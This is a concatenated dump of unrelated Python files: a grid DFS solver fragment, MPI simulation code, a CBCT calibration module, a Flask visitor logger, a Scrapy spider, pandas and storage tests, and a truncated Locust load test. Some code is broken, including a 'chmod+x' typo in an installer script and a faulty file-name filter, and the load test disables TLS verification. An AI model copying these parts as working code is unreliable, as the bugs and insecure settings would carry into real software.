dfs(i, j, visited)
return maxGold
s = Solution()
print(
s.getMaximumGold([[0, 0, 0, 22, 0, 24], [34, 23, 18, 0, 23, 2], [11, 39, 20, 12, 0, 0], [39, 8, 0, 2, 0, 1], [19, 32, 26, 20, 20, 30],
[0, 38, 26, 0, 29, 31]]))
print(s.getMaximumGold([[0, 6, 0], [5, 8, 7], [0, 9, 0]]))
print(s.getMaximumGold([[1, 0, 7, 0, 0, 0], [2, 0, 6, 0, 1, 0], [3, 5, 6, 7, 4, 2], [4, 3, 1, 0, 2, 0], [3, 0, 5, 0, 20, 0]]))
print(s.getMaximumGold([[1, 0, 7], [2, 0, 6], [3, 4, 5], [0, 3, 0], [9, 0, 20]]))
|
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements; and to You under the Apache License, Version 2.0. "
import numpy as np
from mpi4py import MPI
import os
import time
import sys
def simulate_nest_generator(path):
'''
simulate the spike generator of the translator for tvb to nest
:param path: the path to the file for the connections
:return:
'''
print("Nest_Input:" + path)
print("Nest_Input :Waiting for port details");sys.stdout.flush()
while not os.path.exists(path):
print ("Port file not found yet, retry in 1 second")
time.sleep(1)
'''
### OLD Code
### TODO: further investigate the '.unlock' file approach
max_mpi_connection_attempts = 50
file_unlock=False
for attempt in range(max_mpi_connection_attempts):
print("file to read",path);sys.stdout.flush()
if os.path.exists(path+".unlock"):
print ("MPI connection file available after t={0} seconds".format(attempt));sys.stdout.flush()
file_unlock=True
break
if file_unlock is False:
print("Could file not unlocked after 20 attempts, exit");sys.stdout.flush()
sys.exit (1)
'''
fport = open(path, "r")
port=fport.readline()
fport.close()
print("Nest_Input :wait connection "+port);sys.stdout.flush()
comm = MPI.COMM_WORLD.Connect(port)
print('Nest_Input :connect to '+port);sys.stdout.flush()
status_ = MPI.Status()
# NOTE: hardcoded...
ids=np.arange(0,10,1) # random id of spike detector
print(ids);sys.stdout.flush()
while(True):
# Send start simulation
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=0)
# NOTE: hardcoded...
comm.Send([np.array(10,dtype='i'), MPI.INT], dest=1, tag=0)
# send ID of spike generator
comm.Send([np.array(ids,dtype='i'), MPI.INT], dest=1, tag=0)
# receive the number of spikes for updating the spike detector
size=np.empty(11,dtype='i')
comm.Recv([size,11, MPI.INT], source=1, tag=ids[0],status=status_)
print ("Nest_Input (" + str(ids[0]) + ") :receive size : " + str(size));sys.stdout.flush()
# receive the spikes for updating the spike detector
data = np.empty(size[0], dtype='d')
comm.Recv([data,size[0], MPI.DOUBLE],source=1,tag=ids[0],status=status_)
print ("Nest_Input (" + str(id) + ") : " + str(np.sum(data)));sys.stdout.flush()
# printing value and exist
print ("Nest_Input: Before print ");sys.stdout.flush()
if ids[0] == 0:
print ("Nest_Input:" + str([ids[0], data,np.sum(data)]) );sys.stdout.flush()
print ("Nest_Input: debug end of loop");sys.stdout.flush()
        # send the end-of-run signal for the simulation
print("Nest_Input: Debug before send");sys.stdout.flush()
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=1)
print("Nest_Input: Debug after send");sys.stdout.flush()
print ("Nest_Input: before break");sys.stdout.flush()
# print ("Nest_Input: before break" + str(data > 10000));sys.stdout.flush()
if np.any(data > 10000):
break
# closing the connection at this end
print('Nest_Input : Disconnect')
comm.Send([np.array([True], dtype='b'), MPI.CXX_BOOL], dest=1, tag=2)
comm.Disconnect()
MPI.Close_port(port)
print('Nest_Input :exit')
MPI.Finalize()
if __name__ == "__main__":
import sys
if len(sys.argv)==2:
simulate_nest_generator(sys.argv[1])
else:
print('missing argument')
|
import os
os.system("pip3 install proxyscrape")
os.system("cp proxygrab.py proxygrab")
os.system("chmod+x proxygrab")
os.system("mv proxygrab /usr/local/bin/")
print("file copied")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from core_backend import context
from core_backend.service import handler
from core_backend.libs import token as tk
from core_backend.libs.exception import Error
from server.domain.models import WechatshopShipper
import logging
import settings
logger = logging.getLogger(__name__)
class Handler(handler.handler):
""" 快递公司列表 """
def dispatch(self, session):
req_body = self.context.request.body
resp_body = self.context.response.body
name = req_body.params.name
page = req_body.params.page or 1
size = req_body.params.size or 10
limit = size
offset = (page - 1) * size
data = []
total = session.query(WechatshopShipper).count()
shipper_list = session.query(WechatshopShipper).order_by(WechatshopShipper.id.asc()).limit(limit).offset(offset).all()
data = [s.to_dict() for s in shipper_list]
resp_body.data = dict(
data=data,
currentPage=page,
count=total,
)
|
from datetime import datetime, timedelta
from pytz.tzinfo import StaticTzInfo
class OffsetTime(StaticTzInfo):
"""
A dumb timezone based on offset such as +0530, -0600, etc.
"""
def __init__(self, offset):
hours = int(offset[:3])
minutes = int(offset[0] + offset[3:])
self._utcoffset = timedelta(hours=hours, minutes=minutes)
def load_datetime(value, dt_format):
"""
Create timezone-aware datetime object
"""
if dt_format.endswith('%z'):
dt_format = dt_format[:-2]
offset = value[-5:]
value = value[:-5]
        if ':' in offset:
            # strip : from HH:MM if needed (isoformat() adds it between HH and MM);
            # the sign then sits at the end of `value`, so re-attach it
            offset = value[-1] + offset.replace(':', '')
            value = value[:-1]
return OffsetTime(offset).localize(datetime.strptime(value, dt_format))
return datetime.strptime(value, dt_format)
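# Example:
#   load_datetime('2020-01-01T12:00:00-05:30', '%Y-%m-%dT%H:%M:%S%z')
# returns a datetime localized to a fixed -0530 offset.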
|
"""Main module."""
import os
from datetime import datetime
import numpy as np
from scipy.optimize import least_squares
import click
import matplotlib.pyplot as plt
from geometric_calibration.reader import (
read_img_label_file,
read_projection_hnc,
read_projection_raw,
)
from geometric_calibration.utils import (
deg2rad,
angle2rotm,
get_grayscale_range,
create_camera_matrix,
project_camera_matrix,
drag_and_drop_bbs,
search_bbs_centroids,
)
def calibrate_cbct(projection_dir, bbs_3d, sad, sid):
"""Main CBCT Calibration routines.
:param projection_dir: path to directory containing .raw files
:type projection_dir: str
:param bbs_3d: array containing 3D coordinates of BBs
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:return: dictionary with calibration results
:rtype: dict
"""
# RCS: room coordinate system
# A: isocenter
# Read image labels
labels_file_path = os.path.join(projection_dir, "imgLabels.txt")
proj_file, angles = read_img_label_file(labels_file_path)
# Initialize output dictionary
results = {
"proj_angles": [],
"panel_orientation": [],
"sid": [],
"sad": [],
"isocenter": [],
"source": [],
"panel": [],
"img_center": [],
"err_init": [],
"err_final": [],
}
# Calibrate views
with click.progressbar(
iterable=range(len(angles)), fill_char="=", empty_char=" "
) as prog_bar:
for k in prog_bar:
proj_path = os.path.join(
projection_dir, proj_file[k]
) # path of the current image
if k == 0: # no indications other than nominal values
# Calibrate first view with drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k],
angle_offset=0,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
drag_and_drop=True,
)
else: # if not first iteration
# initialize geometry (based on previous optimization)
angle_offset = angles[k] - angles[k - 1]
image_center = view_results["img_center"]
# Calibrate other views without drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k - 1],
angle_offset=angle_offset,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
image_center=image_center,
drag_and_drop=False,
)
# Update output dictionary
results["proj_angles"].append(view_results["proj_angle"])
results["panel_orientation"].append(
view_results["panel_orientation"]
)
results["sid"].append(view_results["sid"])
results["sad"].append(view_results["sad"])
results["isocenter"].append(view_results["isocenter"])
results["source"].append(view_results["source"])
results["panel"].append(view_results["panel"])
results["img_center"].append(view_results["img_center"])
results["err_init"].append(view_results["err_init"])
results["err_final"].append(view_results["err_final"])
return results
def calibrate_2d(projection_dir, bbs_3d, sad, sid):
"""Main 2D Calibration routines.
:param projection_dir: path to directory containing .raw files
:type projection_dir: str
:param bbs_3d: array containing 3D coordinates of BBs
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:return: dictionary with calibration results
:rtype: dict
"""
# RCS: room coordinate system
# A: isocenter
# Find projection files in the current folder
proj_file = []
angles = []
for f in os.listdir(projection_dir):
if ("AP" or "RL") and (".raw" or ".hnc") in f:
proj_file.append(f)
if "AP" in f:
angles.append(0)
elif "RL" in f:
angles.append(90)
# Initialize output dictionary
results = {
"proj_angles": [],
"panel_orientation": [],
"sid": [],
"sad": [],
"isocenter": [],
"source": [],
"panel": [],
"img_center": [],
"err_init": [],
"err_final": [],
}
# Calibrate views
with click.progressbar(
iterable=range(len(angles)), fill_char="=", empty_char=" ",
) as prog_bar:
for k in prog_bar:
proj_path = os.path.join(
projection_dir, proj_file[k]
) # path of the current image
# Calibrate views with drag and drop procedure
view_results = calibrate_projection(
proj_path,
bbs_3d,
sad=sad,
sid=sid,
angle=angles[k],
angle_offset=0,
img_dim=[2048, 1536],
pixel_size=[0.388, 0.388],
search_area=14,
resolution_factor=2,
drag_and_drop=True,
)
# Update output dictionary
results["proj_angles"].append(view_results["proj_angle"])
results["panel_orientation"].append(
view_results["panel_orientation"]
)
results["sid"].append(view_results["sid"])
results["sad"].append(view_results["sad"])
results["isocenter"].append(view_results["isocenter"])
results["source"].append(view_results["source"])
results["panel"].append(view_results["panel"])
results["img_center"].append(view_results["img_center"])
results["err_init"].append(view_results["err_init"])
results["err_final"].append(view_results["err_final"])
return results
def calibrate_projection(
projection_file,
bbs_3d,
sad,
sid,
angle,
angle_offset=0,
img_dim=[1024, 768],
pixel_size=[0.388, 0.388],
search_area=7,
resolution_factor=1,
image_center=None,
drag_and_drop=True,
):
"""Calibration of a single projection.
:param projection_file: path to file
:type projection_file: str
:param bbs_3d: 3D coordinates of phantom's reference points
:type bbs_3d: numpy.array
:param sad: nominal source to isocenter (A) distance
:type sad: float
:param sid: nominal source to image distance
:type sid: float
:param angle: gantry angle for current projection
:type angle: float
:param angle_offset: angle offset for panel, defaults to 0
:type angle_offset: int, optional
:param img_dim: image dimensions in pixels, defaults to [1024, 768]
:type img_dim: list, optional
:param pixel_size: pixel dimensions in mm, defaults to [0.388, 0.388]
:type pixel_size: list, optional
:param search_area: dimension of reference point's searching area, defaults
to 7
:type search_area: int, optional
:param resolution_factor: resolution factor, when mode is "cbct" this
parameter equals to 1, in 2D mode is 2 (because resolution is doubled),
defaults to 1
:type resolution_factor: int, optional
    :param image_center: center of image, defaults to None
    :type image_center: list, optional
    :param drag_and_drop: whether or not to perform Drag&Drop correction routines,
typically set to True for first projection. Defaults to True
:type drag_and_drop: bool, optional
    :raises Exception: if 5 or fewer BB centroids are recognized, the optimizer
        automatically fails since the calibration can't be considered reliable
:return: dictionary with calibration results for current projection
:rtype: dict
"""
results = {}
if image_center is None: # in case image_center is not declared
image_center = [img_dim[1] / 2, img_dim[0] / 2]
isocenter = [0, 0, 0]
# panel orientation (from panel to brandis reference - rotation along y)
panel_orientation = np.array([0, deg2rad(angle), 0]) + np.array(
[0, deg2rad(angle_offset), 0]
)
# Load projection
if ".raw" in projection_file:
img = read_projection_raw(projection_file, img_dim)
elif ".hnc" in projection_file:
img = read_projection_hnc(projection_file, img_dim)
# Project points starting from extrinsic and intrinsic parameters
# generate proj_matrix (extrinsic and intrinsic parameters)
T = create_camera_matrix(panel_orientation, sid, sad, pixel_size, isocenter)
# projected coordinates of brandis on panel plane
r2d = project_camera_matrix(
bbs_3d, image_center, T, resolution_factor
) # 2d coordinates of reference points
grayscale_range = get_grayscale_range(img)
if drag_and_drop is True:
# Overlay reference bbs with projection
r2d_corrected = drag_and_drop_bbs(
projection_path=img,
bbs_projected=r2d,
grayscale_range=grayscale_range,
)
# Starting from the updated coordinates, define a search area around them
# and identify the bbs as black pixels inside these areas (brandis are used
# as probes)
if drag_and_drop is True:
bbs_centroid = search_bbs_centroids(
img=img,
ref_2d=r2d_corrected,
search_area=search_area,
dim_img=img_dim,
grayscale_range=grayscale_range,
)
else:
bbs_centroid = search_bbs_centroids(
img=img,
ref_2d=r2d,
search_area=search_area,
dim_img=img_dim,
grayscale_range=grayscale_range,
)
# Calibration - non linear data fitting optimization problem
index = np.where(~np.isnan(bbs_centroid[:, 0]))[0]
# Estimated BBs
bbs_estim_init = bbs_centroid[
~np.isnan(bbs_centroid).any(axis=1)
] # not consider if out of searching area
# Real Brandis BBs
bbs_real_init = bbs_3d[index, :]
# x0
parameters = np.append(panel_orientation, image_center).tolist()
parameters.append(sid)
parameters.append(sad)
# Boundaries
angle_limit = 0.05
sid_sad_limit = 1
low_bound = [
-angle_limit,
-np.pi,
-angle_limit,
0,
0,
sid - sid_sad_limit,
sad - sid_sad_limit,
]
up_bound = [
angle_limit,
np.pi,
angle_limit,
img_dim[1],
img_dim[0],
sid + sid_sad_limit,
sad + sid_sad_limit,
]
    if index.shape[0] > 5:  # more than 5 BBs required
sol = least_squares(
fun=calibration_cost_function,
x0=parameters,
args=(bbs_real_init, pixel_size, bbs_estim_init, isocenter,),
method="trf",
bounds=(low_bound, up_bound)
# verbose=2,
)
sol = sol.x # Solution found
panel_orientation_new = np.array(sol[:3]) # New panel orientation
image_center_new = np.array(sol[3:5]) # New center of image
sid_new = sol[5]
sad_new = sol[6]
isocenter_new = isocenter
else:
raise Exception("Cannot properly process last projection. Please Retry")
# project based on calibration - use new panel orientation,
# tube and panel position
T = create_camera_matrix(
panel_orientation_new, sid_new, sad_new, pixel_size, isocenter_new
) # projected coordinates of brandis on panel plane
bbs_estim_final = project_camera_matrix(
bbs_3d, image_center_new, T
) # projected BBs (considering unknown)
# calculate improvement
err_init = bbs_estim_init - r2d[index, :] # estimated - projected
err_final = bbs_estim_init - bbs_estim_final[index, :]
err_init = np.mean(abs(err_init))
err_final = np.mean(abs(err_final))
# calculate new source/panel position
T_new = angle2rotm(
panel_orientation_new[0],
panel_orientation_new[1],
panel_orientation_new[2],
)
R_new = T_new[:3, :3]
source_new = (isocenter_new + (R_new * np.array([0, 0, sad_new])))[:, 2]
panel_new = (isocenter_new + (R_new * np.array([0, 0, sad_new - sid_new])))[
:, 2
]
# update with new value
results["proj_angle"] = angle
results["panel_orientation"] = panel_orientation_new
results["sid"] = sid_new
results["sad"] = sad_new
results["isocenter"] = isocenter_new
results["source"] = source_new
results["panel"] = panel_new
results["img_center"] = image_center_new
results["err_init"] = err_init
results["err_final"] = err_final
return results
def calibration_cost_function(param, bbs_3d, pixel_size, bbs_2d, isocenter):
"""Cost Function for calibration optimizers.
:param param: parameters to be optimized
:type param: list
:param bbs_3d: 3D coordinates of reference BBs
:type bbs_3d: numpy.array
:param pixel_size: pixel dimensions in mm
:type pixel_size: list
:param bbs_2d: 2D coordinates of BBs projected on the current image
:type bbs_2d: numpy.array
:param isocenter: coordinates of isocenter
:type isocenter: numpy.array
:return: cost function value to be minimized
:rtype: float
"""
# unknown
panel_orientation = np.array(param[:3])
img_center = np.array(param[3:5])
sid = np.array(param[5])
sad = np.array(param[6])
T = create_camera_matrix(
panel_orientation, sid, sad, pixel_size, isocenter
) # projected coordinates of brandis on panel plane
r2d = project_camera_matrix(
bbs_3d, img_center, T
) # projected bbs (considering unknown)
delta = r2d - bbs_2d # Error
diff = np.square(delta[:, 0]) + np.square(
delta[:, 1]
) # consider both directions
return diff
def plot_calibration_results(calib_results):
"""Plot source/panel position after calibration.
:param calib_results: dictionary containing results of a calibration
:type calib_results: dict
"""
source_pos = np.array(calib_results["source"])
panel_pos = np.array(calib_results["panel"])
isocenter = np.array(calib_results["isocenter"])
def on_key_pressed(event):
if event.key == "enter":
plt.close()
# Plot panel and source positions (trajectory)
fig = plt.figure(num="Source/Panel Position")
fig.canvas.mpl_connect("key_press_event", on_key_pressed)
ax = fig.add_subplot(111, projection="3d")
ax.scatter(
source_pos[:, 0],
source_pos[:, 1],
source_pos[:, 2],
marker=".",
c="g",
label="Source Position",
)
ax.scatter(
panel_pos[:, 0],
panel_pos[:, 1],
panel_pos[:, 2],
marker=".",
c="r",
label="Panel Position",
)
ax.scatter(
isocenter[0, 0],
isocenter[0, 1],
isocenter[0, 2],
marker=".",
c="b",
label="Isocenter Position",
)
plt.title("Panel/Source position after calibration\nPress Enter to close")
ax.set_xlabel("X Label [mm]")
ax.set_ylabel("Y Label [mm]")
ax.set_zlabel("Z Label [mm]")
fig.legend(loc="lower right")
plt.show()
def save_lut(path, calib_results, mode):
"""Save LUT file for a calibration.
:param path: path to .raw file directory, where LUT will be saved
:type path: str
:param calib_results: dictionary containing results for a calibration
:type calib_results: dict
:param calib_results: acquisition modality for calibration
:type calib_results: string
"""
angles = calib_results["proj_angles"]
panel_orientation = calib_results["panel_orientation"]
image_center = calib_results["img_center"]
sid = calib_results["sid"]
sad = calib_results["sad"]
clock = datetime.now()
if mode == "cbct":
filename = "CBCT_LUT_{}_{:02}_{:02}-{:02}_{:02}.txt".format(
clock.year, clock.month, clock.day, clock.hour, clock.minute,
)
elif mode == "2d":
filename = "2D_LUT_{}_{:02}_{:02}-{:02}_{:02}.txt".format(
clock.year, clock.month, clock.day, clock.hour, clock.minute,
)
output_file = os.path.join(path, filename)
with open(output_file, "w") as res_file:
res_file.write(f"#Look Up Table for {mode.upper()} reconstruction\n")
res_file.write(
"#Angle (deg) | Panel Orientation(rad) [X Y Z] | Image_center(pixel) X Y | SID(mm) | SAD(mm)\n"
)
res_file.write(
"#Date:{}_{}_{}_Time:{}_{}_{}.{}\n".format(
clock.year,
clock.month,
clock.day,
clock.hour,
clock.minute,
clock.second,
clock.microsecond,
)
)
res_file.write("#\n")
res_file.write("# --> END OF HEADER. FIXED SIZE: 5 lines. \n")
for k in range(len(angles)):
res_file.write(
"{:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f} {:6.12f}\n".format(
angles[k],
panel_orientation[k][0],
panel_orientation[k][1],
panel_orientation[k][2],
image_center[k][0],
image_center[k][1],
sid[k],
sad[k],
)
)
res_file.write(
r"# END OF FILE. REQUIRED TO ENSURE '\n' at the end of last calibration line. NO MORE LINES AFTER THIS!!!"
)
|
from flask import request, make_response
import datetime
import calendar
import random
import string
import pymysql
import json
from ast import literal_eval
from secrets import secrets
sql_host = secrets['sql']['host']
sql_port = secrets['sql']['port']
sql_username = secrets['sql']['username']
sql_password = secrets['sql']['password']
sql_db = secrets['sql']['db']
sql_table = secrets['sql']['table']
# This function checks whether the visitor has a cookie.
# If the visitor has a cookie, it returns the webpage as-is.
# If not, it creates a cookie and returns the webpage with it set.
# Either way it calls log_visit to record the visit.
def set_cookie(html):
cookie = request.cookies.get('x')
domain = request.host
    # Calculate the epoch time from UTC for consistency in case server and local time differ.
    date_now = datetime.datetime.utcnow()
    epoch_time = str(round(calendar.timegm(date_now.timetuple())))
    if cookie is not None:
resp = html
else:
randomchars = ''.join(
[random.choice(string.ascii_letters + string.digits) for n in range(32)])
cookie = epoch_time + randomchars
resp = make_response(html)
resp.set_cookie("x", cookie, domain=domain, httponly=True)
log_visit(cookie, epoch_time, domain)
return resp
def log_visit(cookie, epoch_time, domain):
if domain in request.url:
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
        # Use a parameterized query so pymysql escapes all request-controlled
        # values, preventing SQL injection. The table name comes from local
        # config (secrets), so concatenating it is safe here.
        visitorip = request.remote_addr
        c.execute(
            "INSERT INTO " + sql_table +
            " (USER_AGENT, REFERER, URL, IP, EPOCHTIME, COOKIE)"
            " VALUES (%s, %s, %s, %s, %s, %s);",
            (request.user_agent.string, request.headers.get("Referer"),
             request.url, visitorip, epoch_time, cookie))
db.commit()
db.close()
message = 'Visit added to the database.'
else:
message = 'Site domain is not in the url. Not adding visit to the database.'
return json.dumps({'message': message})
def return_epoch_time(num_days):
    # Calculate the epoch time from UTC for consistency in case server and local time differ.
date_now = datetime.datetime.utcnow()
epoch_time_now = calendar.timegm(date_now.timetuple())
epoch_time_x_days_ago = str(round(epoch_time_now - num_days * 86400))
return epoch_time_x_days_ago
def get_data_from_table(query):
# get data from table and if num_days is not 0 then use it as a filter
# return a list to the user
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
sqlquery = query + ';'
try:
c.execute(sqlquery)
data = c.fetchall()
    except Exception:
        data = "Failed to gather data for your query."
db.close()
return str(data)
# Get the number of unique ip addresses.
# Call get_total_num_unique_ips(0) for all time unique visits by ip.
# Call get_total_num_unique_ips(1) to get unique number of ips for one visit.
def get_total_num_unique_ips(num_days):
query = 'SELECT COUNT(DISTINCT IP) AS x FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
    num_ips = get_data_from_table(query)
    # get_data_from_table returns str(fetchall()), e.g. "((42,),)";
    # the slice extracts the bare count.
    return num_ips[2:-4]
# Get the number of unique visits by cookie.
# Call get_total_num_unique_cookies(0) for all time unique visits by cookies.
# Call get_total_num_unique_cookies(1) to get unique number cookies.
def get_total_num_unique_cookies(num_days):
query = 'SELECT COUNT(DISTINCT COOKIE) AS x FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
num_cookies = get_data_from_table(query)
return num_cookies[2:-4]
def listify(raw):
    # Strip the outer parentheses that str(fetchall()) adds, rebuild the
    # text as a list literal, and evaluate it safely with literal_eval.
    raw = raw[1:-1]
    raw = '[' + raw + ']'
    return literal_eval(raw)
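# Example of the round-trip (illustrative): get_data_from_table returns
# str(cursor.fetchall()), e.g. "(('1.2.3.4',), ('5.6.7.8',))", and
#   listify("(('1.2.3.4',), ('5.6.7.8',))") == [('1.2.3.4',), ('5.6.7.8',)]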
def get_unique_ip_addresses(num_days):
# list unique ip addresses
query = 'SELECT DISTINCT IP FROM ' + sql_table
if num_days != 0:
query = query + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days)
list_of_ips = get_data_from_table(query)
return listify(list_of_ips)
def get_unique_urls(num_days):
    # list unique URLs with their visit counts
query = 'SELECT URL, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY URL ORDER BY 2'
if num_days != 0:
query = 'SELECT URL, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY URL ORDER BY 2'
list_of_urls = get_data_from_table(query)
return listify(list_of_urls)
def get_unique_user_agents(num_days):
    # list unique user agents with their visit counts
query = 'SELECT user_agent, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY user_agent ORDER BY 2'
if num_days != 0:
query = 'SELECT user_agent, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY user_agent ORDER BY 2'
list_user_agents = get_data_from_table(query)
return listify(list_user_agents)
def get_unique_referers(num_days):
    # list unique referers with their visit counts
query = 'SELECT REFERER, COUNT(*) AS "#" FROM ' + \
sql_table + ' GROUP BY REFERER ORDER BY 2'
if num_days != 0:
query = 'SELECT REFERER, COUNT(*) AS "#" FROM ' + sql_table + ' WHERE EPOCHTIME > ' + \
return_epoch_time(num_days) + ' GROUP BY REFERER ORDER BY 2'
list_referers = get_data_from_table(query)
return listify(list_referers)
def get_unique_cookies_chart_data():
db = pymysql.connect(host=sql_host, port=sql_port,
user=sql_username, passwd=sql_password, db=sql_db)
c = db.cursor()
    # http://stackoverflow.com/questions/11743019/convert-python-datetime-to-epoch-with-strftime
    # Calculate the epoch time from UTC for consistency in case server and local time differ.
    date_now = datetime.datetime.utcnow()
    # Midnight (UTC) at the start of today, then one cutoff per day going
    # back a week: cutoffs[0] is today's midnight, cutoffs[7] is the
    # midnight seven days before that.
    today_midnight = datetime.datetime(
        date_now.year, date_now.month, date_now.day, 0, 0)
    epoch_today_midnight = calendar.timegm(today_midnight.timetuple())
    cutoffs = [epoch_today_midnight - d * 86400 for d in range(8)]
    # One COUNT per day bucket, joined with UNION ALL. Only the first
    # SELECT's alias survives the union, so the result is simply eight
    # count rows: today first, then each of the previous seven days.
    selects = ['SELECT COUNT(DISTINCT COOKIE) AS DAY_COUNT FROM ' + sql_table +
               ' WHERE EPOCHTIME > ' + str(cutoffs[0])]
    for day in range(1, 8):
        selects.append('SELECT COUNT(DISTINCT COOKIE) FROM ' + sql_table +
                       ' WHERE EPOCHTIME < ' + str(cutoffs[day - 1]) +
                       ' AND EPOCHTIME > ' + str(cutoffs[day]))
    sqlquery = ' UNION ALL '.join(selects) + ';'
try:
c.execute(sqlquery)
data = c.fetchall()
data_list = listify(str(data))
unique_cookies_chart_data = []
        for row in data_list:
            unique_cookies_chart_data.append(str(row[0]))
        unique_cookies_chart_data = str(unique_cookies_chart_data)
    except Exception:
        unique_cookies_chart_data = "Failed to gather the unique cookies chart data."
db.close()
return unique_cookies_chart_data
|
# -*- coding: utf-8 -*-
import json
import scrapy
from locations.items import GeojsonPointItem
class SuperdrugSpider(scrapy.Spider):
name = "superdrug"
item_attributes = {"brand": "Superdrug", "brand_wikidata": "Q7643261"}
allowed_domains = ["superdrug.com"]
download_delay = 0.5
start_urls = ["https://www.superdrug.com/stores/a-to-z"]
def parse(self, response):
urls = response.xpath('//a[@class="row store-link"]/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse_location(self, response):
data = json.loads(
response.xpath(
'//script[@type="application/ld+json" and contains(text(), "streetAddress")]/text()'
).extract_first()
)
properties = {
"name": data["name"],
"ref": data["name"],
"addr_full": data["address"]["streetAddress"],
"city": data["address"]["addressLocality"],
"state": data["address"]["addressRegion"],
"postcode": data["address"]["postalCode"],
"country": data["address"]["addressCountry"],
"phone": data.get("telephone"),
"website": response.url,
"lat": float(
response.xpath(
'//div[@class="store-locator store-locator__overview"]/@data-lat'
).extract_first()
),
"lon": float(
response.xpath(
'//div[@class="store-locator store-locator__overview"]/@data-lng'
).extract_first()
),
}
yield GeojsonPointItem(**properties)
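# To exercise this spider one would typically run, from a Scrapy project
# that includes it (illustrative command, not part of the original file):
#   scrapy crawl superdrug -o superdrug_stores.json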
|
import numpy as np
from pandas import DataFrame, Series, period_range
import pandas._testing as tm
class TestAsFreq:
# TODO: de-duplicate/parametrize or move DataFrame test
def test_asfreq_ts(self):
index = period_range(freq="A", start="1/1/2001", end="12/31/2010")
ts = Series(np.random.randn(len(index)), index=index)
df = DataFrame(np.random.randn(len(index), 3), index=index)
result = ts.asfreq("D", how="end")
df_result = df.asfreq("D", how="end")
exp_index = index.asfreq("D", how="end")
assert len(result) == len(ts)
tm.assert_index_equal(result.index, exp_index)
tm.assert_index_equal(df_result.index, exp_index)
result = ts.asfreq("D", how="start")
assert len(result) == len(ts)
tm.assert_index_equal(result.index, index.asfreq("D", how="start"))
|
import os
import logging
import pytest
from nondjango.storages import utils, storages
logging.getLogger('boto3').setLevel(logging.ERROR)
logging.getLogger('botocore').setLevel(logging.ERROR)
logging.getLogger('s3transfer').setLevel(logging.ERROR)
def test_prepare_empty_path():
utils.prepare_path('')
def test_filesystem_storages_honor_workdir():
storage = storages.TemporaryFilesystemStorage()
filename = 'test_file.txt'
f = storage.open(filename, 'w+')
f.write('test payload')
f.close()
workdir = storage._workdir
assert filename in os.listdir(workdir), 'File is not on the storage workdir'
@pytest.mark.parametrize("storage_class, storage_params", [
(storages.TemporaryFilesystemStorage, {}),
(storages.S3Storage, {'workdir': 's3://gn-ninja/storage-test/'}),
])
def test_file_read_write(storage_class, storage_params):
payload = 'test payload'
storage = storage_class(**storage_params)
    try:
        storage.delete('test_file.txt')
    except NotImplementedError:
        raise
    except Exception:
        # A missing file is fine; we only need a clean slate before the test.
        pass
assert not storage.exists('test_file.txt')
with storage.open('test_file.txt', 'w+') as f:
f.write(payload)
assert storage.exists('test_file.txt')
with storage.open('test_file.txt', 'r') as f2:
assert f2.read() == payload
|
import json
import random
import requests
from config import DataSets
from locust import HttpUser, SequentialTaskSet, task, between, TaskSet
from locust.clients import HttpSession
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import server.tests.decode_fbs as decode_fbs
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
"""
Simple locust stress test definition for cellxgene
"""
API_SUFFIX = "api/v0.2"
class CellXGeneTasks(TaskSet):
"""
Simulate use against a single dataset
"""
def on_start(self):
self.client.verify = False
self.dataset = random.choice(DataSets)
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/schema", stream=True, catch_response=True
) as schema_response:
if schema_response.status_code == 200:
self.schema = schema_response.json()["schema"]
else:
self.schema = None
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/config", stream=True, catch_response=True
) as config_response:
if config_response.status_code == 200:
self.config = config_response.json()["config"]
else:
self.config = None
with self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/var?annotation-name={self.var_index_name()}",
headers={"Accept": "application/octet-stream"},
catch_response=True,
) as var_index_response:
if var_index_response.status_code == 200:
df = decode_fbs.decode_matrix_FBS(var_index_response.content)
gene_names_idx = df["col_idx"].index(self.var_index_name())
self.gene_names = df["columns"][gene_names_idx]
else:
self.gene_names = []
def var_index_name(self):
if self.schema is not None:
return self.schema["annotations"]["var"]["index"]
return None
def obs_annotation_names(self):
if self.schema is not None:
return [col["name"] for col in self.schema["annotations"]["obs"]["columns"]]
return []
def layout_names(self):
if self.schema is not None:
return [layout["name"] for layout in self.schema["layout"]["obs"]]
else:
return []
@task(2)
class InitializeClient(SequentialTaskSet):
"""
Initial loading of cellxgene - when the user hits the main route.
Currently this sequence skips some of the static assets, which are quite small and should be served by the
